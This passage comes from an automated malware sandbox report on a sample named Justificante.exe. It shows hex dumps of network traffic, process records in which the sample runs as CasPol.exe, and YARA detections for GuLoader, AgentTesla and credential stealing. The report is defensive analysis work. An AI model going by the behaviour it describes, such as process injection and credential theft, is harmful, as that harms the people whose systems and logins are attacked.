6b ea ba d2 df 1d 80 9c 45 4b 90 58 b8 ee 2b 63 98 dc d4 39 03 18 0d f0 98 0b 25 9b e5 0a ad 21 e1 80 2e aa b2 d4 31 0d 70 5c c1 69 3a 3f 96 ba 41 ff e2 3f 63 c8 f1 8d 5b ec 26 36 6b 8f 81 cd 42 7e 56 19 ad
                              Data Ascii: 0hV_`8kKw~aduAi(4%Qyx^S)8O0lr'FeFS32DM7R6e*h!xpd?rR/BPOMB;2DkEKX+c9%!.1p\i:?A?c[&6kB~V
                              2021-11-23 11:22:36 UTC221INData Raw: 42 2e 29 63 25 ec b6 7b a9 4b 53 0e 10 5d 11 c0 45 34 98 d5 85 12 eb 2d 4d 7c f3 26 f2 7d f9 7a d3 f4 c9 aa 76 47 32 9c 09 6b c1 34 d4 a8 b2 2f 87 ee b6 13 fe 8d 3a fe 7f b3 63 8f 18 77 5b 00 5d 7f 3e 13 d9 b9 fe 99 2b 49 85 53 92 8d 3a d9 d7 58 d6 ac 06 2f 08 e1 e9 b7 15 92 85 21 25 6c 2f d8 b4 dd ea ab fe f9 bb 2d 7e 82 d7 8f 6b 1b 24 0e f7 f3 ba 67 7a 2b d8 66 27 8d fe 2b 30 0e 02 d7 5f e8 18 f7 ab bb 72 01 82 84 a6 29 34 51 43 de 10 49 d6 f6 66 a1 4a 46 6d 7c 3b 69 af 73 16 a6 f3 e5 ab b2 d8 47 db 9b 2f 8b 2c 36 d4 fd 6c da 70 cc 15 04 9b 2a 11 36 42 72 cb 67 ec a2 c6 e7 01 75 6d 78 8f fd 64 bf ec 09 09 70 12 9f a2 72 ff d3 ed 3b f6 d1 fb b5 f9 67 b4 71 74 8c 0a 7c 9e 85 b8 57 3e 60 7c c1 f0 91 6c 02 09 ea a3 1e c0 e3 f1 1e ae 79 4b bf f3 2c e6 8e ba
                              Data Ascii: B.)c%{KS]E4-M|&}zvG2k4/:cw[]>+IS:X/!%l/-~k$gz+f'+0_r)4QCIfJFm|;isG/,6lp*6Brgumxdpr;gqt|W>`|lyK,


                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:12:21:54
                              Start date:23/11/2021
                              Path:C:\Users\user\Desktop\Justificante.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Justificante.exe"
                              Imagebase:0x400000
                              File size:192512 bytes
                              MD5 hash:7B58393D3DF51A592B86E85FEDC61F33
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Reputation:low

                              General

                              Start time:12:22:15
                              Start date:23/11/2021
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Justificante.exe"
                              Imagebase:0xdf0000
                              File size:108664 bytes
                              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.75558223607.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.76597546211.000000001E441000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:moderate

                              General

                              Start time:12:22:16
                              Start date:23/11/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6c6270000
                              File size:875008 bytes
                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Disassembly

                              Code Analysis

                              Reset < >